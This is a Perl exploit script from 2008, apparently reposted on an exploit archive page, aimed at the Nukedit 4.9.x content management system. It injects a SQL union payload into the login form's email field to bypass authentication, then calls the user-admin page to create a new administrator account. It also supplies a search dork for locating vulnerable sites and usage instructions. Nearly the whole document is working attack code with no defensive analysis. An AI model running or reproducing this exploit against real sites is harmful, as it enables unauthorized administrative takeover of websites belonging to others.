Home / os / win10

nukeditadmin-sql.txt

Posted on 27 February 2008

#!/usr/bin/perl
###########################################################
#Title:       Nukedit 4.9.x Create Admin Exploit          #
#                                                         #
#Credit:      r3dm0v3                                     #
#             http://r3dm0v3.persianblog.ir               #
#             r3dm0v3[4t]yahoo[dot]com                    #
#             Tehran - Iran                               #
#                                                         #
#Download:    http://www.nukedit.com/content/Download.asp #
#Vulnerables: 4.9.x, prior versions maybe affected.       #
#Remote:      Yes                                         #
#Dork:        "Powered by Nukedit"                        #
#Fix:         Not Available                               #
###########################################################

use LWP::UserAgent;
use HTTP::Cookies;


$host = $ARGV[0];
if (substr($host,length($host)-1,1) ne "/"){
$host.="/";
}
$usrmail = $ARGV[1];
$passwd = $ARGV[2];
$url = "http://".$host;
$usrSQL= "' union select 1,1,'r3dm0v3',4,'ENCfc2aef9fe5f2c546429e2e1d9fd737e6da5b1b94707518619576129a915d0c2c',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from tblusers where 'x'='x";


&Banner();
if (@ARGV < 3) {
&Usage();
exit(1);
}


print "[~] Host: $host 
";
print "[~] Email/Password: $usrmail/$passwd
";
print "[~] Logging in...
";


$xpl = LWP::UserAgent->new() || die;
$cookie_jar = HTTP::Cookies->new();

$xpl->cookie_jar( $cookie_jar );
$res = $xpl->post($url.'utilities/login.asp',
Content => [
"redir"        => "/nukedit/default.asp",
"email"        => "$usrSQL",
"password"     => "r3dm0v3",
"savepassword" => "false",
"submit"       => "Login",
],);



if ($res->content =~ /Object Moved/){
print "[+] Logged in
";
}else{
print "[-] Can not login!
";
exit();
}


print "[~] Creating Admin...
";


$res = $xpl->post($url.'utilities/useradmin.asp',
Content => [
"action"          => "addDB",
"username"        => "r3dm0v3",
"company"         => "red move",
"url"             => "http://r3dm0v3.persianblog.ir",
"address"         => "a",
"county"          => "b",
"zip"             => "666",
"country"         => "Iran",
"phone"           => "66666666",
"fax"             => "12345678",
"email"           => "$usrmail",
"password"        => "$passwd",
"groupid"         => "1",
"submit1"         => "Add User >>",
"IP"              => "127.0.0.2",
],);


if ($res->content =~ /Object Moved/){
print "[+] Admin added. Login info:
".
"    email:    $usrmail
".
"    password: $passwd
";
}else{
print "[-] Exploit failed!
";
print $res->content;
}



sub Banner{
print "############################################################
".
"#            Nukedit 4.9.x Create Admin Exploit            #
".
"#                       by r3dm0v3                         #
".
"#                  r3dm0v3[4t]yahoo[.]com                  #
".
"#               http://r3dm0v3.persianblog.ir              #
".
"############################################################
";
}


sub Usage(){
print "
 Usage: nukedit.pl <host&path> <email> <password>
";
print " ex.  : nukedit.pl site.com/nukedit/ myname@somewhere.com 123456
";
}

 

TOP

Malware :

Exploits :